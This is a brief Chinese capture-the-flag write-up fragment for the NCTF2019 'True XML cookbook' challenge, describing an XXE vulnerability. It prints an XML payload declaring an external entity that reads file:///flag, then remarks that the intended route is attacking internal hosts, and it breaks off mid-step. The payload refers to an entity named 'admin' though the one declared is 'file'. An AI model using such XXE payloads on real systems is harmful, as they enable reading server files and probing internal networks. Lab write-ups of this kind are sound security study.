[NCTF2019]True XML cookbook
抓包,发现存在XXE漏洞
添加外部注入实体
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM "file:///flag">
]>
<user>
<username>&admin;</username>
<password>password</password>
</user>
没有回显出flag
这里考的是XXE漏洞可以直接攻击内网用户
读取用户信息: